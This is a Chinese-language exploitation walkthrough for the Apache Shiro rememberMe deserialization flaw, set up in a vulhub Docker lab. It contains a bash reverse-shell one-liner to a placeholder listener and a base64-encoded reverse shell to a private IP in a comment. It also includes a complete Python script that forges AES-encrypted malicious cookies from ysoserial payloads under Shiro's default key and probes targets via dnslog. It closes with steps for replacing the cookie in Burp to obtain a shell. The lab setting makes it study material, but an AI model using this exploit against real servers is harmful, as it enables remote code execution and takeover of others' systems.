0x00、原理说明
0x01、环境搭建
1、vulhub + docker
2、访问ip
0x02、漏洞利用
制作反弹shell
bash -i >& /dev/tcp/反弹IP/端口 0>&1
然后在 http://www.jackson-t.ca/runtime-exec-payloads.html 上进行java反序列化绕过base64编码
在监听机上监听反弹端口
构造恶意cookies
import os
import sys
import time
import json
import uuid
import base64
import argparse
import subprocess
from random import Random
from Crypto.Cipher import AES
from requests import Session
class ShiroExp:
    """Probe / cookie builder for Apache Shiro's ``rememberMe`` mechanism.

    Shiro decrypts the ``rememberMe`` cookie with a server-side AES key and
    then Java-deserializes the plaintext. This class reproduces that cookie
    format under the well-known default key (see ``encode_rememberme``), so
    only an application still running that default key will decrypt and
    deserialize what the cookie carries. Defensive takeaway: a per-deployment
    random key breaks the whole chain, and oversized / unexpected
    ``rememberMe`` values on POST requests are the observable artefact on the
    wire.
    """
    # tstr = 'test.'
    # Marker that get_subd() extends with the dnslog subdomain; check() looks
    # for it in the dnslog records.
    tstr = ''
    # Class-level Session shared by all instances; used only for the dnslog.cn
    # calls (test() opens a separate Session for the target).
    session = Session()

    def __init__(self, target: str):
        """Store the target URL; no network activity happens here."""
        self.target = target

    def get_subd(self):
        """Fetch a fresh dnslog.cn subdomain and append it to ``tstr``.

        Returns True on HTTP 200. Any other status falls through and returns
        None; run() does not check the result.
        """
        r = self.session.get('http://www.dnslog.cn/getdomain.php')
        if r.status_code == 200:
            self.subd = r.text
            # From here on the instance attribute shadows the class-level tstr.
            self.tstr += self.subd
            print('dnslog SubDomain', self.subd)
            return True

    def test(self):
        """POST to the target with a ``rememberMe`` cookie carrying ``ping <marker>``."""
        session = Session()
        session.cookies['rememberMe'] = self.encode_rememberme("ping "+ self.tstr)
        print('send payload')
        # The HTTP response is discarded: the outcome is judged out-of-band by check().
        session.post(self.target)

    def check(self):
        """Poll dnslog.cn up to three times, one second apart, for the marker.

        Returns True as soon as ``tstr`` appears in the records; otherwise
        prints the negative line and returns None. Three one-second polls is
        a short window, so a slow resolver path can produce a false negative.
        """
        print('checking...')
        for i in range(3):
            time.sleep(1)
            r = self.session.get("http://www.dnslog.cn/getrecords.php")
            if r.status_code == 200:
                if self.tstr in r.text:
                    print(f"[+] {self.target} 存在漏洞")
                    return True
        print(f"[-] {self.target} 不存在漏洞")

    def run(self):
        """Full detection sequence: obtain subdomain, send probe, poll dnslog."""
        self.get_subd()
        self.test()
        self.check()

    def encode_rememberme(self, command: str) -> str:
        """Build a Shiro-format ``rememberMe`` cookie around a ysoserial payload.

        ``command`` is handed to ``ysoserial.jar`` (CommonsBeanutils1 chain);
        the serialized object read from its stdout is PKCS#7-padded and
        AES-CBC encrypted under the base64 key below with a random 16-byte IV.
        Returns base64(iv || ciphertext) as text, which is the layout Shiro
        expects in the cookie.
        """
        # ysoserial.jar is expected in the working directory; the process
        # handle is never waited on or closed.
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
        BS = AES.block_size
        # PKCS#7: append N bytes of value N, N in 1..BS.
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        # Shiro's historical default rememberMe key. A deployment that replaced
        # it with a random key will simply fail to decrypt this cookie.
        key = "kPH+bIxk5D2deZiIxcaaaA=="
        mode = AES.MODE_CBC
        # uuid4().bytes is 16 bytes (random apart from the version/variant
        # bits), i.e. exactly one AES block for the IV.
        iv = uuid.uuid4().bytes
        encryptor = AES.new(base64.b64decode(key), mode, iv)
        file_body = pad(popen.stdout.read())
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext.decode()
def run_poc(target):
    """Run the dnslog-based detection sequence against ``target``."""
    exp = ShiroExp(target)
    exp.run()
def run_exp(target, exp):
    """Print a ``rememberMe=`` cookie wrapping the command string ``exp``.

    ``target`` is only stored on the ShiroExp instance; nothing is sent to it.
    """
    # tmp = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
    poc = ShiroExp(target)
    print('rememberMe='+poc.encode_rememberme(exp))
if __name__ == '__main__':
    # Usage text is built from the script's own basename so it stays correct after a rename.
    parser = argparse.ArgumentParser(usage=f'\n\t{os.path.basename(sys.argv[0])} -p -t target\n\t{os.path.basename(sys.argv[0])} -c command')
    parser.add_argument('-p', '--poc', action='store_true', help='对目标使用POC进行漏洞检测')
    parser.add_argument('-c', '--command', action='store', help='生成EXP的命令')
    parser.add_argument('-t', '--target', action='store', help='目标')
    options = parser.parse_args()
    # -p is only honoured together with -t; -p alone falls through to the -c
    # branch or, failing that, to the help text.
    if options.poc and options.target:
        try:
            run_poc(options.target)
        except KeyboardInterrupt:
            print('User Exit...')
            # Site-module builtin exit(); sys.exit() is the portable spelling.
            exit()
    elif options.command:
        # options.target may be None here; run_exp only stores it on the instance.
        run_exp(options.target, options.command)
    else:
        parser.print_help()
# payload = encode_rememberme(sys.argv[1])
# with open("./payload.cookie", "w") as fpw:
# print("rememberMe={}".format(payload.decode()), file=fpw)
执行脚本获得cookie,这时候带上反弹shell的poc
使用burp抓包
替换cookies值
发送之后就可以在监听机上获得shell